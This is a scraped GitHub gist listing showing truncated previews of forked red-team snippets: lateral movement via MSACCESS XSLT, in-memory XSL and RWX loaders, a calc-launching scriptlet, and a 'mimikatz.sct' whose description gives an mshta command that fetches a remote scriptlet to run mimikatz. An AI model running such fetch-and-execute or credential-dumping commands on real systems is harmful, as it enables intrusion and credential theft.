manilz manilz
manilz
/ dllmain.go
Last active
January 23, 2023 17:18
— forked from NaniteFactory/dllmain.go
An implementation example of DllMain() entrypoint with Golang. $ go build --buildmode=c-shared -o my.dll && rundll32.exe my.dll Test
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| //#include "dllmain.h" | |
| import "C" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "bytes" | |
| "fmt" | |
| "io" | |
| "mime/multipart" | |
| "net/http" | |
| "net/http/httptest" | |
| "net/http/httputil" |
manilz
/ Invoke-AccessXSLT.ps1
Created
February 15, 2023 04:53
— forked from TheWover/Invoke-AccessXSLT.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Lateral Movement Via MSACCESS TransformXML | |
| Author: Philip Tsukerman (@PhilipTsukerman) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| #> | |
| function Invoke-AccessXSLT { | |
| <# |
manilz
/ LoadXSLFromMem.cs
Created
February 15, 2023 04:53
— forked from TheWover/LoadXSLFromMem.cs
Loads XSL files from memory (or disk) using the Microsoft.XMLDOM COM object.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace TryCOMXSLLoad | |
| { | |
| class Program |
manilz
/ gist:dd71adcdae2f7f379d625c1fe204e8e1
Created
February 15, 2023 04:55
— forked from TheWover/gist:631ea8b25c6ae4090522eb4d17dc20fc
MSBuild Property Functions - Load RWX Memory Mapped File
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
| <Target Name="Hello" > | |
| <!-- Call ANY .NET API --> | |
| <!-- | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1+1 |
manilz
/ Lookup CLSID in PowerShell
Created
February 24, 2023 01:59
— forked from brad-anton/Lookup CLSID in PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Lookup-Clsid | |
| { | |
| Param([string]$clsid) | |
| $CLSID_KEY = 'HKLM:\SOFTWARE\Classes\CLSID' | |
| If ( Test-Path $CLSID_KEY\$clsid) { | |
| $name = (Get-ItemProperty -Path $CLSID_KEY\$clsid).'(default)' | |
| $dll = (Get-ItemProperty -Path $CLSID_KEY\$clsid\InProcServer32).'(default)' | |
| } | |
| $name, $dll |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Hacker Disassembler Engine 64 | |
| * Copyright (c) 2008-2009, Vyacheslav Patkov. | |
| * All rights reserved. | |
| * | |
| * hde64.h: C/C++ header file | |
| * | |
| */ | |
| #ifndef _HDE64_H_ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <public> | |
| </public> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
| ]]> |
manilz
/ mimikatz.sct
Created
March 16, 2023 06:24
— forked from vector-sec/mimikatz.sct
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
OlderNewer